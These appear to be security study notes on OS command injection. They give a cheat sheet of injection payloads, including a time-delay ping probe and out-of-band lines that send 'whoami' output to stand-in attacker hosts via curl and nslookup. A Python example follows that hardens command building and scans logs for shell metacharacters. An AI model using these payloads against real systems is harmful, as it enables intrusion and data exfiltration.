OS command injection

Command injection

& echo qwerty &

Placing & after the injected command is generally useful because it separates the injected command from whatever follows the injection point.

Blind OS command injection

Detection

# 10 sec. time delay
& ping -c 10 127.0.0.1 &

Exploit

  1. Redirecting output. Note: you must have write permission to a directory the web server serves
& whoami > /var/www/static/whoami.txt &
curl https://website.com/whoami.txt
  2. Out-of-band techniques
& curl `whoami`.webserver-attacker.com & # HTTP traffic may be blocked
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

Bypass restriction

There are many ways; see: https://book.hacktricks.wiki/linux-hardening/bypass-bash-restrictions/index.html

Metacharacters

# Windows & Unix
&
&&
|
||

# Unix
;

# Unix inline execution
`command`
$(command)
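Added example (not from the original notes): the vulnerable string-splicing pattern beside its hardened argv form, plus a log scanner that flags query values carrying the separators listed above. The endpoint, its `host` parameter, the allowlist regex and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# This page's metacharacter list (& && | || ; `cmd` $(cmd)) as a regex.
METACHAR_RE = re.compile(r"&&|\|\||[&|;`]|\$\(")
# Allowlist for the only parameter the sample endpoint takes: hostname or IPv4.
# The pattern is an assumption made for this example.
HOST_RE = re.compile(r"^(?:[A-Za-z0-9-]{1,63}\.)*[A-Za-z0-9-]{1,63}$")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def contains_shell_metacharacters(value: str) -> bool:
    """Denylist check: True if value carries any separator from the page.
    Fine for detection in logs or a WAF, not a substitute for the allowlist."""
    return METACHAR_RE.search(value) is not None

def build_command_unsafe(host: str) -> str:
    """Vulnerable pattern: input spliced into one string that a shell parses
    (os.system, subprocess.run(..., shell=True)). host='& echo qwerty &'
    gives 'ping -c 1 & echo qwerty &': two commands, not one argument."""
    return f"ping -c 1 {host}"

def build_command_safe(host: str) -> list[str]:
    """Hardened form: allowlist the value, then build an argv list for
    subprocess.run(argv) with shell=False, so the value is always exactly
    one literal argument and no separator is ever interpreted."""
    if not HOST_RE.match(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return ["ping", "-c", "1", host]

def flag_suspicious_params(log_lines: list[str]) -> list[tuple[str, str]]:
    """Return (param, decoded value) pairs from access-log lines whose query
    values contain injection metacharacters after URL decoding."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, values in parse_qs(urlsplit(m.group(1)).query).items():
            hits += [(name, v) for v in values if contains_shell_metacharacters(v)]
    return hits

# Constructed sample log lines (not real traffic): one benign request, then
# the echo probe and the 10-second ping delay from this page, URL-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ping?host=example.com HTTP/1.1" 200 311',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /ping?host=%26+echo+qwerty+%26 HTTP/1.1" 200 318',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /ping?host=%26+ping+-c+10+127.0.0.1+%26 HTTP/1.1" 200 311',
]
```

Running `flag_suspicious_params(SAMPLE_LOG)` returns the two probe values and skips the benign request; `build_command_safe` rejects the same values before any command is built.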